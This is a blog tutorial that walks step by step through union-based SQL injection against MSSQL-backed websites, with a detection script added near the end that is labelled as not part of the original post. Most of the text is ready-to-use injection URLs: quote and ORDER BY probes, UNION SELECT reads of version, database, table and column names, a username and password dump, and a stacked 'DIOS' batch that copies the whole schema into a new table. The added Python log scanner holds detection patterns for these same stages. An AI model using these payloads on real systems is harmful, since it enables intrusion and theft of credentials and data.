MSSQL Union Based Injection Step By Step

Today I am going to show you MSSQL union-based injection step by step. In this post I will only cover the basics. I don't see many detailed tutorials on the Internet, so I am going to do what I can to help out based on my experience with MS SQL injections. First of all we need to know the basics of injecting; all of the basics, including finding the type of injection, testing the database and finding the number of columns, are the same as for other databases, so I suggest you read the basics before you start here if you have not already.

So, let's start 😀

  • The checking part is the same as for MySQL: first put a single quote, then a double quote, and check the error. From this I came to know that this one is a single-quote-based injection.
www.site.com/?id=1%27 [ Error ]
www.site.com/?id=1%22 [ Error ]

Remember: when both the single quote and the double quote give an error, there is a high probability that the injection is integer based. With a single-quote-based injection the double quote does not give an error, and with a double-quote-based injection the single quote does not give an error; when both the single quote and the double quote give an error, apply the golden rule that the injection is integer type.

  • Now let's break and fix the query:
    www.site.com/?id=1 -- - [ Working Fine ]
    www.site.com/?id=1 order by 5-- - [ Working Fine ]
    www.site.com/?id=1 order by 6-- - [ Error ]

    That means the total number of columns is 5.

  • We continue with ORDER BY until we come to know that 5 is the last working column. The next part is the UNION SELECT query:
www.site.com/?id=1 and false UnIoN SeLeCt 1,2,3,4,5-- -
    [screenshot: error returned by the UNION SELECT query]

If you get this error, we have the option to use null in place of the numbers:

www.site.com/?id=1 and false UnIoN SeLeCt null,null,null,null,null-- -
  • Now we have to convert each column, one by one, to @@version or db_name(); you will see in the video how I did it ;).
  • When we put @@version in a column, if that column is vulnerable it shows the version, something like this:
    [screenshot: @@version output displayed in the page]

There are some other ways to collect more information from MSSQL, given here:

  1. @@version – gives the version.
  2. db_name() – gives the name of the current database.
  3. user, system_user, current_user, user_name – give the current user.
  4. @@SERVERNAME – gives the hostname.
  • Now we will extract the table names. Here the syntax is a little different from MySQL because MSSQL lacks a LIMIT clause.
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,table_name,3,db_name(),5 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
  • In this way, keep increasing the TOP value. In the video I have only shown diosing the site.
  • Now in the same manner we can extract the column names. Let's see:
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 1 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
http://site.com/?id=1 and false Union All Select 1,column_name,3,db_name(),5 from (select top 2 column_name from information_schema.columns where table_name='your table name here' order by 1) as shit order by 1 desc--
  • Now let's dump the data from the tables and columns. Here for concatenation we can use %2b, which is the URL encoding of '+':
http://site.com/?id=1 and false Union All Select 1,username%2b' '%2bpassword,3,db_name(),5 from your_table_name_here --

Now we have almost done this. Let's come to the diosing part.

This DIOS has been created by my friends Zen and Rummy. By diosing the site we can make the whole process faster.

How to DIOS the MSSQL site:

DIOS:

;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--

  • Just remove the UNION SELECT and fix the query, then add the DIOS and execute it as shown below; for more details see the video.
http://site.com/?id=1;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='Injected by Ahmed :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into Ahmed1 END--
  • It will give an error, but it is actually creating the DIOS table, so now let's try checking the output under Ahmed1.

[screenshot: DIOS output read back from the Ahmed1 table]

  • And here we get the complete output at once. Before I finish I would like to show you some basic errors in MSSQLi.
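As an added defender-side example (not code from the original post), here is a small Python scanner that looks for the request sequence described above in web-server access logs: it URL-decodes each query string (so %27, %22, %2b and %20 become literal), folds the UnIoN SeLeCt case tricks, and flags the quote probe, ORDER BY enumeration, UNION SELECT, information_schema reads and the stacked ;begin declare batch per client IP, along with how many 5xx responses accompanied them. The log format, IP addresses and paths are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Constructed log sample (not from the post): 10.0.0.5 walks through the stages above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?id=1%27 HTTP/1.1" 500 210
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=1%20order%20by%206--%20- HTTP/1.1" 500 210
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?id=1%20and%20false%20UnIoN%20SeLeCt%20null,null,null,null,null--%20- HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /?id=1%20and%20false%20Union%20All%20Select%201,table_name,3,db_name(),5%20from%20(select%20top%201%20table_name%20from%20information_schema.tables%20order%20by%201)%20as%20t%20order%20by%201%20desc-- HTTP/1.1" 200 640
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /?id=1;begin%20declare%20@x%20varchar(8000)%20select%20@x%20as%20output%20into%20t1%20END-- HTTP/1.1" 500 210
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /?id=42 HTTP/1.1" 200 512
"""

# Common log format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3})')

RULES = {  # one rule per stage of the walkthrough, applied to the normalised query string
    "quote_probe": re.compile(r"=\d+['\"]$"),                   # id=1' or id=1"
    "order_by_enum": re.compile(r"\border\s+by\s+\d+"),         # column counting
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"), # union (all) select
    "schema_read": re.compile(r"information_schema\.(tables|columns)"),
    "stacked_batch": re.compile(r";\s*begin\s+declare\b"),      # the DIOS batch
    "comment_tail": re.compile(r"--\s*-?\s*$"),                 # -- or -- - terminator
}

def normalise(path: str) -> str:
    """Decode %xx and fold case/whitespace so UnIoN SeLeCt equals union select."""
    query = path.partition("?")[2]
    return re.sub(r"\s+", " ", unquote_plus(query)).strip().lower()

def scan_line(line: str):
    """Return (ip, status, matched stage names) for one line, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = normalise(m.group("path"))
    return m.group("ip"), int(m.group("status")), [n for n, rx in RULES.items() if rx.search(q)]

def scan_log(text: str) -> dict:
    """Per client IP: stages seen, flagged requests and 5xx responses among them."""
    report = {}
    for line in text.splitlines():
        r = scan_line(line)
        if r and r[2]:  # only requests that matched at least one stage
            c = report.setdefault(r[0], {"stages": set(), "requests": 0, "errors": 0})
            c["stages"].update(r[2])
            c["requests"] += 1
            c["errors"] += int(r[1] >= 500)
    return report
```

The last sample request also shows why the DIOS stage is a permissions finding: SELECT ... INTO creates a new table, so it only succeeds when the application's database login holds CREATE TABLE, which a least-privilege web login should not have.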

So here we finish MSSQL union-based injection. Keep practicing and learning, guys.

Author: Ahmed Raza Memon

I am a 17-year-old Ethical Hacker, Penetration Tester, Web Security Expert and Exploit Writer from India. My areas of expertise include Ethical Hacking, Vulnerability Assessment, Information Security Audits, Penetration Testing, Exploit Writing, Web Application Security, Source Code Reviews, Forensic Investigation and Cyber Law. I have been acknowledged by many top companies like Microsoft, Apple, SAP, AOL, Sony and many more...
